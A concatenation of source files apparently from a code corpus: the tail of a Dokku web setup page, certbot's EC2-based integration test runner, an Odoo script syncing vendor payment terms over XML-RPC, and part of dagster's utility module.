<small class="form-text text-muted">Public keys allow users to ssh onto the server as the <code>dokku</code> user, as well as remotely execute Dokku commands. They are currently auto-populated from: <code>{AUTHORIZED_KEYS_LOCATION}</code>, and can be changed later via the <a href="http://dokku.viewdocs.io/dokku/deployment/user-management/" target="_blank"><code>dokku ssh-keys</code></a> plugin.</small>
</div>
</div>
</div>
<div class="row">
<div class="col">
<h3>Hostname Configuration</h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" placeholder="A hostname or ip address such as {HOSTNAME}" />
<small class="form-text text-muted">This will be used as the default host for all applications, and can be changed later via the <a href="http://dokku.viewdocs.io/dokku/configuration/domains/" target="_blank"><code>dokku domains:set-global</code></a> command.</small>
</div>
<div class="form-check">
<input class="form-check-input" type="checkbox" id="vhost" name="vhost" value="true">
<label class="form-check-label" for="vhost">Use virtualhost naming for apps</label>
<small class="form-text text-muted">When enabled, Nginx will be run on port 80 and proxy requests to apps based on hostname.</small>
<small class="form-text text-muted">When disabled, a specific port will be setup for each application on first deploy, and requests to that port will be proxied to the relevant app.</small>
</div>
<div class="alert alert-warning small mt-3 d-{UFW_DISPLAY}" role="alert">
<strong>Warning:</strong> UFW is active. To allow traffic to specific ports, run <code>sudo ufw allow PORT</code> for the port in question.
</div>
<div class="bd-callout bd-callout-info">
<h5>What will app URLs look like?</h5>
<pre><code id="example">http://hostname:port</code></pre>
</div>
</div>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span class="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
var $ = document.querySelector.bind(document)
function setup() {
if ($("#key").value.trim() == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($("#hostname").value.trim() == "") {
alert("Your hostname cannot be blank.")
return
}
var data = new FormData($("#form"))
var inputs = [].slice.call(document.querySelectorAll("input, textarea, button"))
inputs.forEach(function (input) {
input.disabled = true
})
var result = $(".result")
fetch("/setup", {method: "POST", body: data})
.then(function(response) {
if (response.ok) {
return response.json()
} else {
throw new Error('Server returned error')
}
})
.then(function(response) {
result.classList.add("text-success");
result.textContent = "Success! Redirecting in 3 seconds. .."
setTimeout(function() {
window.location.href = "http://dokku.viewdocs.io/dokku~{VERSION}/deployment/application-deployment/";
}, 3000);
})
.catch(function (error) {
result.classList.add("text-danger");
result.textContent = "Could not send the request"
})
}
function update() {
if ($("#vhost").matches(":checked") && $("#hostname").value.match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").checked = false;
}
if ($("#vhost").matches(':checked')) {
$("#example").textContent = "http://<app-name>."+$("#hostname").value
} else {
$("#example").textContent = "http://"+$("#hostname").value+":<app-port>"
}
}
$("#vhost").addEventListener("change", update);
$("#hostname").addEventListener("input", update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
multitester.py
|
"""
Certbot Integration Test Tool
- Configures (canned) boulder server
- Launches EC2 instances with a given list of AMIs for different distros
- Copies certbot repo and puts it on the instances
- Runs certbot tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>python multitester.py targets.yaml MyKeyPair.pem HappyHacker scripts/test_letsencrypt_auto_venv_only.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
from __future__ import print_function
from __future__ import with_statement
import sys, os, time, argparse, socket, traceback
import multiprocessing as mp
from multiprocessing import Manager
import urllib2
import yaml
import boto3
from botocore.exceptions import ClientError
import fabric
from fabric.api import run, execute, local, env, sudo, cd, lcd
from fabric.operations import get, put
from fabric.context_managers import shell_env
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
help='profile for AWS (i.e. as in ~/.aws/certificates)')
parser.add_argument('test_script',
default='test_letsencrypt_auto_certonly_standalone.sh',
help='path of bash script in to deploy and run')
#parser.add_argument('--script_args',
# nargs='+',
# help='space-delimited list of arguments to pass to the bash test script',
# required=False)
parser.add_argument('--repo',
default='https://github.com/letsencrypt/letsencrypt.git',
help='certbot git repo to use')
parser.add_argument('--branch',
default='~',
help='certbot git branch to trial')
parser.add_argument('--pull_request',
default='~',
help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
action='store_true',
help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
action='store_true',
help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
default='',
help="server from which to pull candidate release packages")
parser.add_argument('--killboulder',
action='store_true',
help="do not leave a persistent boulder server running")
parser.add_argument('--boulderonly',
action='store_true',
help="only make a boulder server")
parser.add_argument('--fast',
action='store_true',
help="use larger instance types to run faster (saves about a minute, probably not worth it)")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = None if cl_args.aws_profile == 'SET_BY_ENV' else cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
BOULDER_AMI = 'ami-072a9534772bec854' # premade shared boulder AMI 18.04LTS us-east-1
LOGDIR = "letest-%d"%int(time.time()) #points to logging / working directory
SECURITY_GROUP_NAME = 'certbot-security-group'
SENTINEL = None #queue kill signal
SUBNET_NAME = 'certbot-subnet'
class Status(object):
"""Possible statuses of client tests."""
PASS = 'pass'
FAIL = 'fail'
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def should_use_subnet(subnet):
"""Should we use the given subnet for these tests?
We should if it is the default subnet for the availability zone or the
subnet is named "certbot-subnet".
"""
if not subnet.map_public_ip_on_launch:
return False
if subnet.default_for_az:
return True
for tag in subnet.tags:
if tag['Key'] == 'Name' and tag['Value'] == SUBNET_NAME:
return True
return False
def make_security_group(vpc):
"""Creates a security group in the given VPC."""
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = vpc.create_security_group(GroupName=SECURITY_GROUP_NAME,
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=80, ToPort=80)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=443, ToPort=443)
# for boulder wfe (http) server
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=4000, ToPort=4000)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(ec2_client,
instance_name,
ami_id,
keyname,
security_group_id,
subnet_id,
machine_type='t2.micro',
userdata=""): #userdata contains bash or cloud-init script
block_device_mappings = _get_block_device_mappings(ec2_client, ami_id)
tags = [{'Key': 'Name', 'Value': instance_name}]
tag_spec = [{'ResourceType': 'instance', 'Tags': tags}]
return ec2_client.create_instances(
BlockDeviceMappings=block_device_mappings,
ImageId=ami_id,
SecurityGroupIds=[security_group_id],
SubnetId=subnet_id,
KeyName=keyname,
MinCount=1,
MaxCount=1,
UserData=userdata,
InstanceType=machine_type,
TagSpecifications=tag_spec)[0]
def _get_block_device_mappings(ec2_client, ami_id):
"""Returns the list of block device mappings to ensure cleanup.
This list sets connected EBS volumes to be deleted when the EC2
instance is terminated.
"""
# Not all devices use EBS, but the default value for DeleteOnTermination
# when the device does use EBS is true. See:
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-mapping.html
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-template.html
return [{'DeviceName': mapping['DeviceName'],
'Ebs': {'DeleteOnTermination': True}}
for mapping in ec2_client.Image(ami_id).block_device_mappings
if not mapping.get('Ebs', {}).get('DeleteOnTermination', True)]
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_http_ready(urlstring, wait_time=10, timeout=240):
"Blocks until server at urlstring can respond to http requests"
server_ready = False
t_elapsed = 0
while not server_ready and t_elapsed < timeout:
try:
sys.stdout.write('.')
sys.stdout.flush()
req = urllib2.Request(urlstring)
response = urllib2.urlopen(req)
#if response.code == 200:
server_ready = True
except urllib2.URLError:
pass
time.sleep(wait_time)
t_elapsed += wait_time
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
"Blocks until server at ipstring has an open port 22"
reached = False
t_elapsed = 0
while not reached and t_elapsed < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipstring, 22))
reached = True
except socket.error as err:
time.sleep(wait_time)
t_elapsed += wait_time
sock.close()
def block_until_instance_ready(booting_instance, wait_time=5, extra_wait_time=20):
"Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
state = booting_instance.state['Name']
ip = booting_instance.public_ip_address
while state != 'running' or ip is None:
time.sleep(wait_time)
# The instance needs to be reloaded to update its local attributes. See
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Instance.reload.
booting_instance.reload()
state = booting_instance.state['Name']
ip = booting_instance.public_ip_address
block_until_ssh_open(ip)
time.sleep(extra_wait_time)
return booting_instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(repo_url):
"clones master of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt'% repo_url)
local('tar czf le.tar.gz letsencrypt')
def local_git_branch(repo_url, branch_name):
"clones branch <branch_name> of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt --branch %s --single-branch'%(repo_url, branch_name))
local('tar czf le.tar.gz letsencrypt')
def local_git_PR(repo_url, PRnumstr, merge_master=True):
"clones specified pull request from repo_url and optionally merges into master"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt'% repo_url)
local('cd letsencrypt && git fetch origin pull/%s/head:lePRtest'%PRnumstr)
local('cd letsencrypt && git checkout lePRtest')
if merge_master:
local('cd letsencrypt && git remote update origin')
local('cd letsencrypt && git merge origin/master -m "testmerge"')
local('tar czf le.tar.gz letsencrypt')
def local_repo_to_remote():
"copies local tarball of repo to remote"
with lcd(LOGDIR):
put(local_path='le.tar.gz', remote_path='')
run('tar xzf le.tar.gz')
def local_repo_clean():
"delete tarball"
with lcd(LOGDIR):
local('rm le.tar.gz')
def deploy_script(scriptpath, *args):
"copies to remote and executes local script"
#with lcd('scripts'):
put(local_path=scriptpath, remote_path='', mirror_local_mode=True)
scriptfile = os.path.split(scriptpath)[1]
args_str = ' '.join(args)
run('./'+scriptfile+' '+args_str)
def run_boulder():
with cd('$GOPATH/src/github.com/letsencrypt/boulder'):
run('sudo docker-compose up -d')
def config_and_launch_boulder(instance):
execute(deploy_script, 'scripts/boulder_config.sh')
execute(run_boulder)
def install_and_launch_certbot(instance, boulder_url, target):
execute(local_repo_to_remote)
with shell_env(BOULDER_URL=boulder_url,
PUBLIC_IP=instance.public_ip_address,
PRIVATE_IP=instance.private_ip_address,
PUBLIC_HOSTNAME=instance.public_dns_name,
PIP_EXTRA_INDEX_URL=cl_args.alt_pip,
OS_TYPE=target['type']):
execute(deploy_script, cl_args.test_script)
def grab_certbot_log():
"grabs letsencrypt.log via cat into logged stdout"
sudo('if [ -f /var/log/letsencrypt/letsencrypt.log ]; then \
cat /var/log/letsencrypt/letsencrypt.log; else echo "[novarlog]"; fi')
# fallback file if /var/log is unwriteable...? correct?
sudo('if [ -f ./certbot.log ]; then \
cat ./certbot.log; else echo "[nolocallog]"; fi')
def create_client_instance(ec2_client, target, security_group_id, subnet_id):
"""Create a single client instance for running tests."""
if target['virt'] == 'hvm':
machine_type = 't2.medium' if cl_args.fast else 't2.micro'
else:
# 32 bit systems
machine_type = 'c1.medium' if cl_args.fast else 't1.micro'
if 'userdata' in target.keys():
userdata = target['userdata']
else:
userdata = ''
name = 'le-%s'%target['name']
print(name, end=" ")
return make_instance(ec2_client,
name,
target['ami'],
KEYNAME,
machine_type=machine_type,
security_group_id=security_group_id,
subnet_id=subnet_id,
userdata=userdata)
def test_client_process(inqueue, outqueue, boulder_url):
cur_proc = mp.current_process()
for inreq in iter(inqueue.get, SENTINEL):
ii, instance_id, target = inreq
# Each client process is given its own session due to the suggestion at
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/resources.html?highlight=multithreading#multithreading-multiprocessing.
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
instance = ec2_client.Instance(id=instance_id)
#save all stdout to log file
sys.stdout = open(LOGDIR+'/'+'%d_%s.log'%(ii,target['name']), 'w')
print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
instance = block_until_instance_ready(instance)
print("server %s at %s"%(instance, instance.public_ip_address))
env.host_string = "%s@%s"%(target['user'], instance.public_ip_address)
print(env.host_string)
try:
install_and_launch_certbot(instance, boulder_url, target)
outqueue.put((ii, target, Status.PASS))
print("%s - %s SUCCESS"%(target['ami'], target['name']))
except:
outqueue.put((ii, target, Status.FAIL))
print("%s - %s FAIL"%(target['ami'], target['name']))
traceback.print_exc(file=sys.stdout)
pass
# append server certbot.log to each per-machine output log
print("\n\ncertbot.log\n" + "-"*80 + "\n")
try:
execute(grab_certbot_log)
except:
print("log fail\n")
traceback.print_exc(file=sys.stdout)
pass
def cleanup(cl_args, instances, targetlist):
print('Logs in ', LOGDIR)
# If lengths of instances and targetlist aren't equal, instances failed to
# start before running tests so leaving instances running for debugging
# isn't very useful. Let's cleanup after ourselves instead.
if len(instances) == len(targetlist) or not cl_args.saveinstances:
print('Terminating EC2 Instances')
if cl_args.killboulder:
boulder_server.terminate()
for instance in instances:
instance.terminate()
else:
# print login information for the boxes for debugging
for ii, target in enumerate(targetlist):
print(target['name'],
target['ami'],
"%s@%s"%(target['user'], instances[ii].public_ip_address))
def main():
# Fabric library controlled through global env parameters
env.key_filename = KEYFILE
env.shell = '/bin/bash -l -i -c'
env.connection_attempts = 5
env.timeout = 10
# replace default SystemExit thrown by fabric during trouble
class FabricException(Exception):
pass
env['abort_exception'] = FabricException
# Set up local copy of git repo
#-------------------------------------------------------------------------------
print("Making local dir for test repo and logs: %s"%LOGDIR)
local('mkdir %s'%LOGDIR)
# figure out what git object to test and locally create it in LOGDIR
print("Making local git repo")
try:
if cl_args.pull_request != '~':
print('Testing PR %s '%cl_args.pull_request,
"MERGING into master" if cl_args.merge_master else "")
execute(local_git_PR, cl_args.repo, cl_args.pull_request, cl_args.merge_master)
elif cl_args.branch != '~':
print('Testing branch %s of %s'%(cl_args.branch, cl_args.repo))
execute(local_git_branch, cl_args.repo, cl_args.branch)
else:
print('Testing master of %s'%cl_args.repo)
execute(local_git_clone, cl_args.repo)
except FabricException:
print("FAIL: trouble with git repo")
traceback.print_exc()
exit()
# Set up EC2 instances
#-------------------------------------------------------------------------------
configdata = yaml.load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
print("Determining Subnet")
for subnet in ec2_client.subnets.all():
if should_use_subnet(subnet):
subnet_id = subnet.id
vpc_id = subnet.vpc.id
break
else:
print("No usable subnet exists!")
print("Please create a VPC with a subnet named {0}".format(SUBNET_NAME))
print("that maps public IPv4 addresses to instances launched in the subnet.")
sys.exit(1)
print("Making Security Group")
vpc = ec2_client.Vpc(vpc_id)
sg_exists = False
for sg in vpc.security_groups.all():
if sg.group_name == SECURITY_GROUP_NAME:
security_group_id = sg.id
sg_exists = True
print(" %s already exists"%SECURITY_GROUP_NAME)
if not sg_exists:
security_group_id = make_security_group(vpc).id
time.sleep(30)
boulder_preexists = False
boulder_servers = ec2_client.instances.filter(Filters=[
{'Name': 'tag:Name', 'Values': ['le-boulderserver']},
{'Name': 'instance-state-name', 'Values': ['running']}])
boulder_server = next(iter(boulder_servers), None)
print("Requesting Instances...")
if boulder_server:
print("Found existing boulder server:", boulder_server)
boulder_preexists = True
else:
print("Can't find a boulder server, starting one...")
boulder_server = make_instance(ec2_client,
'le-boulderserver',
BOULDER_AMI,
KEYNAME,
machine_type='t2.micro',
#machine_type='t2.medium',
security_group_id=security_group_id,
subnet_id=subnet_id)
instances = []
try:
if not cl_args.boulderonly:
print("Creating instances: ", end="")
for target in targetlist:
instances.append(
create_client_instance(ec2_client, target,
security_group_id, subnet_id)
)
print()
# Configure and launch boulder server
#-------------------------------------------------------------------------------
print("Waiting on Boulder Server")
boulder_server = block_until_instance_ready(boulder_server)
print(" server %s"%boulder_server)
# env.host_string defines the ssh user and host for connection
env.host_string = "ubuntu@%s"%boulder_server.public_ip_address
print("Boulder Server at (SSH):", env.host_string)
if not boulder_preexists:
print("Configuring and Launching Boulder")
config_and_launch_boulder(boulder_server)
# blocking often unnecessary, but cheap EC2 VMs can get very slow
block_until_http_ready('http://%s:4000'%boulder_server.public_ip_address,
wait_time=10, timeout=500)
boulder_url = "http://%s:4000/directory"%boulder_server.private_ip_address
print("Boulder Server at (public ip): http://%s:4000/directory"%boulder_server.public_ip_address)
print("Boulder Server at (EC2 private ip): %s"%boulder_url)
if cl_args.boulderonly:
sys.exit(0)
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%LOGDIR)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue
# the latter has implementation flaws that deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
# initiate process execution
for i in range(num_processes):
p = mp.Process(target=test_client_process, args=(inqueue, outqueue, boulder_url))
jobs.append(p)
p.daemon = True # kills subprocesses if parent is killed
p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
inqueue.put((ii, instances[ii].id, target))
# add SENTINELs to end client processes
for i in range(num_processes):
inqueue.put(SENTINEL)
print('Waiting on client processes', end='')
for p in jobs:
while p.is_alive():
p.join(5 * 60)
# Regularly print output to keep Travis happy
print('.', end='')
sys.stdout.flush()
print()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
execute(local_repo_clean)
# print and save summary results
results_file = open(LOGDIR+'/results', 'w')
outputs = [outq for outq in iter(outqueue.get, SENTINEL)]
outputs.sort(key=lambda x: x[0])
failed = False
for outq in outputs:
ii, target, status = outq
if status == Status.FAIL:
failed = True
print('%d %s %s'%(ii, target['name'], status))
results_file.write('%d %s %s\n'%(ii, target['name'], status))
if len(outputs) != num_processes:
failed = True
failure_message = 'FAILURE: Some target machines failed to run and were not tested. ' +\
'Tests should be rerun.'
print(failure_message)
results_file.write(failure_message + '\n')
results_file.close()
if failed:
sys.exit(1)
finally:
cleanup(cl_args, instances, targetlist)
# kill any connections
fabric.network.disconnect_all()
if __name__ == '__main__':
main()
|
25_vendor_terms.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import csv
from xmlrpc import client as xmlrpclib
import multiprocessing as mp
from scriptconfig import URL, DB, UID, PSW, WORKERS
def update_vendor_terms(pid, data_pool, write_ids, error_ids):
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
while data_pool:
try:
data = data_pool.pop()
code = data.get('TERM-CODE')
vals = {'name': data.get('TERM-DESC'),
'note': data.get('TERM-DESC'),
'active': True,
'order_type': 'purchase',
'code': code,
'discount_per': data.get('TERM-DISC-PCT', 0),
'due_days': data.get('TERM-DISC-DAYS', 0),
}
res = write_ids.get(code, [])
if res:
sock.execute(DB, UID, PSW, 'account.payment.term', 'write', res, vals)
print(pid, 'UPDATE - VENDOR TERM', res)
else:
vals['line_ids'] = [(0, 0, {'type': 'balance', 'days': int(data.get('TERM-DAYS-DUE', 0) or 0)})]
res = sock.execute(DB, UID, PSW, 'account.payment.term', 'create', vals)
print(pid, 'CREATE - VENDOR TERM', res)
if not data_pool:
break
except:
break
def sync_terms():
manager = mp.Manager()
data_pool = manager.list()
error_ids = manager.list()
write_ids = manager.dict()
process_Q = []
fp = open('files/aplterm1.csv', 'r')
csv_reader = csv.DictReader(fp)
for vals in csv_reader:
data_pool.append(vals)
fp.close()
domain = [('order_type', '=', 'purchase')]
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
res = sock.execute(DB, UID, PSW, 'account.payment.term', 'search_read', domain, ['id', 'code'])
write_ids = {term['code']: term['id'] for term in res}
res = None
term_codes = None
for i in range(WORKERS):
pid = "Worker-%d" % (i + 1)
worker = mp.Process(name=pid, target=update_vendor_terms, args=(pid, data_pool, write_ids, error_ids))
process_Q.append(worker)
worker.start()
for worker in process_Q:
worker.join()
if __name__ == "__main__":
# PARTNER
sync_terms()
|
__init__.py
|
import contextlib
import datetime
import errno
import inspect
import multiprocessing
import os
import re
import signal
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
# 2/3 compatibility
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
you encode a configuration file path in source file and want
in runnable in any current working directory)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
of that file. Otherwise it will be relative to script that
ran the test
Note: this is function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output(['python', path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = ['python', '-m', 'dagster', 'pipeline', 'execute', '-f', path, '-n', pipeline_fn_name]
if env_file:
cli_cmd.append('-e')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe)
raise cpe
@contextlib.contextmanager
def safe_tempfile_path():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
try:
yield Path(path).as_posix()
finally:
if os.path.exists(path):
os.unlink(path)
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
# This will raise a KeyboardInterrupt in python land - meaning this wont be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(target=_kill_on_event, args=(termination_event,))
int_thread.daemon = True
int_thread.start()
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager(object):
''' Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
